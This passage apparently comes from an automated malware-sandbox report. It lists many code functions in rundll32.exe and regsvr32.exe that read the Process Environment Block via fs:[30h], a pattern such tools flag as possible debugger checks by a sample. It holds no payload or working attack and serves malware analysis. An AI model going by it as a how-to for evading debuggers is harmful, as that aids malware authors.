Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1DAC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB0DA10 mov edx, dword ptr fs:[00000030h]	5_2_7FB0DA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB0DA10 mov eax, dword ptr fs:[00000030h]	5_2_7FB0DA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB57A0D mov eax, dword ptr fs:[00000030h]	5_2_7FB57A0D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB57998 mov eax, dword ptr fs:[00000030h]	5_2_7FB57998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB579DC mov eax, dword ptr fs:[00000030h]	5_2_7FB579DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3D7A5 mov eax, dword ptr fs:[00000030h]	5_2_7FB3D7A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB0D6C0 mov edx, dword ptr fs:[00000030h]	5_2_7FB0D6C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3F610 mov eax, dword ptr fs:[00000030h]	5_2_7FB3F610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3D47E mov eax, dword ptr fs:[00000030h]	5_2_7FB3D47E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2D3E0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB2D3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2D3E0 mov eax, dword ptr fs:[00000030h]	5_2_7FB2D3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2D3E0 mov ecx, dword ptr fs:[00000030h]	5_2_7FB2D3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2D3E0 mov edx, dword ptr fs:[00000030h]	5_2_7FB2D3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2D3E0 mov eax, dword ptr fs:[00000030h]	5_2_7FB2D3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB0D370 mov edx, dword ptr fs:[00000030h]	5_2_7FB0D370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB072D0 mov edx, dword ptr fs:[00000030h]	5_2_7FB072D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3D039 mov eax, dword ptr fs:[00000030h]	5_2_7FB3D039
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB08F30 mov edx, dword ptr fs:[00000030h]	5_2_7FB08F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB08F30 mov ecx, dword ptr fs:[00000030h]	5_2_7FB08F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB08F30 mov ecx, dword ptr fs:[00000030h]	5_2_7FB08F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB06F1A mov eax, dword ptr fs:[00000030h]	5_2_7FB06F1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2AF60 mov eax, dword ptr fs:[00000030h]	5_2_7FB2AF60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3CE97 mov eax, dword ptr fs:[00000030h]	5_2_7FB3CE97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB06E80 mov eax, dword ptr fs:[00000030h]	5_2_7FB06E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB18E10 mov edx, dword ptr fs:[00000030h]	5_2_7FB18E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB18E10 mov edx, dword ptr fs:[00000030h]	5_2_7FB18E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB18E10 mov edx, dword ptr fs:[00000030h]	5_2_7FB18E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB18E10 mov eax, dword ptr fs:[00000030h]	5_2_7FB18E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB18E10 mov edx, dword ptr fs:[00000030h]	5_2_7FB18E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB18E10 mov ecx, dword ptr fs:[00000030h]	5_2_7FB18E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB18E10 mov ecx, dword ptr fs:[00000030h]	5_2_7FB18E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB18E10 mov ecx, dword ptr fs:[00000030h]	5_2_7FB18E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB18E10 mov edx, dword ptr fs:[00000030h]	5_2_7FB18E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3CE02 mov eax, dword ptr fs:[00000030h]	5_2_7FB3CE02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB3CE45 mov eax, dword ptr fs:[00000030h]	5_2_7FB3CE45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB06C70 mov edx, dword ptr fs:[00000030h]	5_2_7FB06C70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB12A20 mov eax, dword ptr fs:[00000030h]	5_2_7FB12A20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A800 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A800 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]	5_2_7FB1A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]	5_2_7FB1A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]	5_2_7FB1A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]	5_2_7FB1A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]	5_2_7FB1A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]	5_2_7FB1A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]	5_2_7FB1A800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB38870 mov ecx, dword ptr fs:[00000030h]	5_2_7FB38870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB38870 mov edx, dword ptr fs:[00000030h]	5_2_7FB38870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB38870 mov eax, dword ptr fs:[00000030h]	5_2_7FB38870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB38870 mov ecx, dword ptr fs:[00000030h]	5_2_7FB38870
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB047D4 mov ecx, dword ptr fs:[00000030h]	5_2_7FB047D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB047D4 mov ecx, dword ptr fs:[00000030h]	5_2_7FB047D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB047D4 mov edx, dword ptr fs:[00000030h]	5_2_7FB047D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB507C8 mov ecx, dword ptr fs:[00000030h]	5_2_7FB507C8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB0E5A0 mov eax, dword ptr fs:[00000030h]	5_2_7FB0E5A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2A560 mov ecx, dword ptr fs:[00000030h]	5_2_7FB2A560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2A560 mov eax, dword ptr fs:[00000030h]	5_2_7FB2A560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2A560 mov ecx, dword ptr fs:[00000030h]	5_2_7FB2A560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB12420 mov edx, dword ptr fs:[00000030h]	5_2_7FB12420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB12420 mov eax, dword ptr fs:[00000030h]	5_2_7FB12420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2E3A0 mov eax, dword ptr fs:[00000030h]	5_2_7FB2E3A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB14392 mov edx, dword ptr fs:[00000030h]	5_2_7FB14392
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB04280 mov edx, dword ptr fs:[00000030h]	5_2_7FB04280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB04280 mov ecx, dword ptr fs:[00000030h]	5_2_7FB04280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB04280 mov ecx, dword ptr fs:[00000030h]	5_2_7FB04280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB04280 mov ecx, dword ptr fs:[00000030h]	5_2_7FB04280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB04280 mov ecx, dword ptr fs:[00000030h]	5_2_7FB04280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB04280 mov edx, dword ptr fs:[00000030h]	5_2_7FB04280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB042E4 mov edx, dword ptr fs:[00000030h]	5_2_7FB042E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB042E4 mov ecx, dword ptr fs:[00000030h]	5_2_7FB042E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB0E250 mov edx, dword ptr fs:[00000030h]	5_2_7FB0E250
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2E1B0 mov eax, dword ptr fs:[00000030h]	5_2_7FB2E1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB2C170 mov eax, dword ptr fs:[00000030h]	5_2_7FB2C170
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1C160 mov edx, dword ptr fs:[00000030h]	5_2_7FB1C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1C160 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]	5_2_7FB1C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]	5_2_7FB1C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]	5_2_7FB1C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]	5_2_7FB1C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]	5_2_7FB1C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1C160 mov edx, dword ptr fs:[00000030h]	5_2_7FB1C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]	5_2_7FB1C160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A0A4 mov ecx, dword ptr fs:[00000030h]	5_2_7FB1A0A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_7FB1A0A4 mov edx, dword ptr fs:[00000030h]	5_2_7FB1A0A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F813740 mov ecx, dword ptr fs:[00000030h]	7_2_7F813740
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F813740 mov ecx, dword ptr fs:[00000030h]	7_2_7F813740
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F813740 mov eax, dword ptr fs:[00000030h]	7_2_7F813740
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F813740 mov edx, dword ptr fs:[00000030h]	7_2_7F813740
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F806F1A mov eax, dword ptr fs:[00000030h]	7_2_7F806F1A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F808F30 mov edx, dword ptr fs:[00000030h]	7_2_7F808F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F808F30 mov ecx, dword ptr fs:[00000030h]	7_2_7F808F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F808F30 mov ecx, dword ptr fs:[00000030h]	7_2_7F808F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82AF60 mov eax, dword ptr fs:[00000030h]	7_2_7F82AF60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F806E80 mov eax, dword ptr fs:[00000030h]	7_2_7F806E80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0 mov edx, dword ptr fs:[00000030h]	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0 mov ecx, dword ptr fs:[00000030h]	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0 mov edx, dword ptr fs:[00000030h]	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]	7_2_7F821EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F825EC0 mov ecx, dword ptr fs:[00000030h]	7_2_7F825EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F837D90 mov ecx, dword ptr fs:[00000030h]	7_2_7F837D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F837D90 mov edx, dword ptr fs:[00000030h]	7_2_7F837D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F837D90 mov eax, dword ptr fs:[00000030h]	7_2_7F837D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F837D90 mov ecx, dword ptr fs:[00000030h]	7_2_7F837D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82ADB0 mov edx, dword ptr fs:[00000030h]	7_2_7F82ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F815CD0 mov ecx, dword ptr fs:[00000030h]	7_2_7F815CD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F806C70 mov edx, dword ptr fs:[00000030h]	7_2_7F806C70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F829A90 mov eax, dword ptr fs:[00000030h]	7_2_7F829A90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F857A0D mov eax, dword ptr fs:[00000030h]	7_2_7F857A0D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F80DA10 mov edx, dword ptr fs:[00000030h]	7_2_7F80DA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F80DA10 mov eax, dword ptr fs:[00000030h]	7_2_7F80DA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F812A20 mov eax, dword ptr fs:[00000030h]	7_2_7F812A20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F857998 mov eax, dword ptr fs:[00000030h]	7_2_7F857998
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F8579DC mov eax, dword ptr fs:[00000030h]	7_2_7F8579DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A800 mov ecx, dword ptr fs:[00000030h]	7_2_7F81A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A800 mov ecx, dword ptr fs:[00000030h]	7_2_7F81A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]	7_2_7F81A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]	7_2_7F81A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]	7_2_7F81A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]	7_2_7F81A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]	7_2_7F81A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]	7_2_7F81A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]	7_2_7F81A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F838870 mov ecx, dword ptr fs:[00000030h]	7_2_7F838870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F838870 mov edx, dword ptr fs:[00000030h]	7_2_7F838870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F838870 mov eax, dword ptr fs:[00000030h]	7_2_7F838870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F838870 mov ecx, dword ptr fs:[00000030h]	7_2_7F838870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F819790 mov eax, dword ptr fs:[00000030h]	7_2_7F819790
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F8507C8 mov ecx, dword ptr fs:[00000030h]	7_2_7F8507C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F8047D4 mov ecx, dword ptr fs:[00000030h]	7_2_7F8047D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F8047D4 mov ecx, dword ptr fs:[00000030h]	7_2_7F8047D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F8047D4 mov edx, dword ptr fs:[00000030h]	7_2_7F8047D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82E690 mov ecx, dword ptr fs:[00000030h]	7_2_7F82E690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F80D6C0 mov edx, dword ptr fs:[00000030h]	7_2_7F80D6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F83F610 mov eax, dword ptr fs:[00000030h]	7_2_7F83F610
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F827660 mov ecx, dword ptr fs:[00000030h]	7_2_7F827660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81966C mov eax, dword ptr fs:[00000030h]	7_2_7F81966C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81966C mov edx, dword ptr fs:[00000030h]	7_2_7F81966C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81966C mov ecx, dword ptr fs:[00000030h]	7_2_7F81966C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81966C mov ecx, dword ptr fs:[00000030h]	7_2_7F81966C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81966C mov ecx, dword ptr fs:[00000030h]	7_2_7F81966C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81966C mov edx, dword ptr fs:[00000030h]	7_2_7F81966C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F80E5A0 mov eax, dword ptr fs:[00000030h]	7_2_7F80E5A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82A560 mov ecx, dword ptr fs:[00000030h]	7_2_7F82A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82A560 mov eax, dword ptr fs:[00000030h]	7_2_7F82A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82A560 mov ecx, dword ptr fs:[00000030h]	7_2_7F82A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F812420 mov edx, dword ptr fs:[00000030h]	7_2_7F812420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F812420 mov eax, dword ptr fs:[00000030h]	7_2_7F812420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F814392 mov edx, dword ptr fs:[00000030h]	7_2_7F814392
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82E3A0 mov eax, dword ptr fs:[00000030h]	7_2_7F82E3A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82D3E0 mov ecx, dword ptr fs:[00000030h]	7_2_7F82D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82D3E0 mov eax, dword ptr fs:[00000030h]	7_2_7F82D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82D3E0 mov ecx, dword ptr fs:[00000030h]	7_2_7F82D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82D3E0 mov edx, dword ptr fs:[00000030h]	7_2_7F82D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82D3E0 mov eax, dword ptr fs:[00000030h]	7_2_7F82D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F80D370 mov edx, dword ptr fs:[00000030h]	7_2_7F80D370
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F804280 mov edx, dword ptr fs:[00000030h]	7_2_7F804280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F804280 mov ecx, dword ptr fs:[00000030h]	7_2_7F804280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F804280 mov ecx, dword ptr fs:[00000030h]	7_2_7F804280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F804280 mov ecx, dword ptr fs:[00000030h]	7_2_7F804280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F804280 mov ecx, dword ptr fs:[00000030h]	7_2_7F804280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F804280 mov edx, dword ptr fs:[00000030h]	7_2_7F804280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F8072D0 mov edx, dword ptr fs:[00000030h]	7_2_7F8072D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F8042E4 mov edx, dword ptr fs:[00000030h]	7_2_7F8042E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F8042E4 mov ecx, dword ptr fs:[00000030h]	7_2_7F8042E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F80E250 mov edx, dword ptr fs:[00000030h]	7_2_7F80E250
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82B260 mov ecx, dword ptr fs:[00000030h]	7_2_7F82B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82B260 mov eax, dword ptr fs:[00000030h]	7_2_7F82B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82B260 mov edx, dword ptr fs:[00000030h]	7_2_7F82B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82B260 mov eax, dword ptr fs:[00000030h]	7_2_7F82B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82B260 mov ecx, dword ptr fs:[00000030h]	7_2_7F82B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82E1B0 mov eax, dword ptr fs:[00000030h]	7_2_7F82E1B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82E1C0 mov edx, dword ptr fs:[00000030h]	7_2_7F82E1C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81C160 mov edx, dword ptr fs:[00000030h]	7_2_7F81C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81C160 mov ecx, dword ptr fs:[00000030h]	7_2_7F81C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]	7_2_7F81C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]	7_2_7F81C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]	7_2_7F81C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]	7_2_7F81C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]	7_2_7F81C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81C160 mov edx, dword ptr fs:[00000030h]	7_2_7F81C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]	7_2_7F81C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F82C170 mov eax, dword ptr fs:[00000030h]	7_2_7F82C170
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A0A4 mov ecx, dword ptr fs:[00000030h]	7_2_7F81A0A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_7F81A0A4 mov edx, dword ptr fs:[00000030h]	7_2_7F81A0A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F133740 mov ecx, dword ptr fs:[00000030h]	11_2_7F133740
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F133740 mov ecx, dword ptr fs:[00000030h]	11_2_7F133740
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F133740 mov eax, dword ptr fs:[00000030h]	11_2_7F133740
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F133740 mov edx, dword ptr fs:[00000030h]	11_2_7F133740
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F126F1A mov eax, dword ptr fs:[00000030h]	11_2_7F126F1A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F128F30 mov edx, dword ptr fs:[00000030h]	11_2_7F128F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F128F30 mov ecx, dword ptr fs:[00000030h]	11_2_7F128F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F128F30 mov ecx, dword ptr fs:[00000030h]	11_2_7F128F30
